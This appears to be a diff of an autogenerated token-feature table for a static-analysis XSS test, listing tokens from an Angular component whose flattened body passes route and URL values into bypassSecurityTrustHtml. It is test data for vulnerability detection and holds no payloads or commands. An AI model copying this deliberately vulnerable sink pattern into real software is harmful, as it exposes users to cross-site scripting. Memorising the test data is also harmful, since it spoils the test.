| enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:55:26:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:64:26:71 | fragment | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:64:26:71 | fragment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:64:26:71 | fragment | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:64:26:71 | fragment | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:64:26:71 | fragment | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | exceptional return of this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | exceptional return of this.sa ... 'foo')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | exceptional return of this.sa ... 'foo')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | exceptional return of this.sa ... 'foo')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | exceptional return of this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | this.sa ... 'foo')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | this.sa ... 'foo')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | this.sa ... 'foo')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:5:27:83 | this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:10:27:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:10:27:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:10:27:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:10:27:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:10:27:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:20:27:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:20:27:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:20:27:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:20:27:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:20:27:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:71 | this.ro ... aramMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:71 | this.ro ... aramMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:71 | this.ro ... aramMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:71 | this.ro ... aramMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:71 | this.ro ... aramMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:75 | this.ro ... Map.get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:75 | this.ro ... Map.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:75 | this.ro ... Map.get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:75 | this.ro ... Map.get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:75 | this.ro ... Map.get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | exceptional return of this.ro ... ('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | exceptional return of this.ro ... ('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | exceptional return of this.ro ... ('foo') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | exceptional return of this.ro ... ('foo') | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | exceptional return of this.ro ... ('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | this.ro ... ('foo') | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | this.ro ... ('foo') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | this.ro ... ('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11977,6 +91050,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | this.ro ... ('foo') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | this.ro ... ('foo') | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:44:27:82 | this.ro ... ('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:49:27:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:49:27:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:49:27:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:49:27:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:49:27:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:55:27:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:55:27:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:55:27:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:55:27:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:55:27:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:64:27:71 | paramMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:64:27:71 | paramMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:64:27:71 | paramMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:64:27:71 | paramMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:64:27:71 | paramMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:73:27:75 | get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:73:27:75 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:73:27:75 | get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:73:27:75 | get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:27:73:27:75 | get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:77:27:81 | 'foo' | CalleeFlexibleAccessPath | this.route.snapshot.paramMap.get | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:77:27:81 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:77:27:81 | 'foo' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11984,6 +91077,71 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:77:27:81 | 'foo' | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap 